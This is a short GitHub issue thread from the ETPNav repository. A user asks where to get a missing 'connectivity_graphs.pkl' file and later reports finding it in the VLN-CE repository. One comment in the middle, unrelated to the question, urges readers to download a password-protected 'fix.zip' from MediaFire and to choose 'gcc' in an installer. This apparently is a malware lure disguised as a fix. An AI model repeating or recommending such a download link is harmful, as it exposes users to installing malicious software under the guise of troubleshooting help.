### ISSUE TITLE
No such file or directory: 'data/connectivity_graphs.pkl'

### ISSUE THREAD

**Issue by Tokishx** [MarSaKi/ETPNav#11]
I wanted to save the navigation results as video, so I changed the yaml configuration as:
     VIDEO_OPTION = [tensorboard,disk]

However, it got an error during running: "No such file or directory: 'data/connectivity_graphs.pkl' "

So where can I get this pkl file?

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tokishx** [comment]
I had found it in https://github.com/jacobkrantz/VLN-CE/

thanks a lot

**Comment by madeline-past** [comment]
Thank you for sharing the solution!

I met the same error in exactly the same procedure.
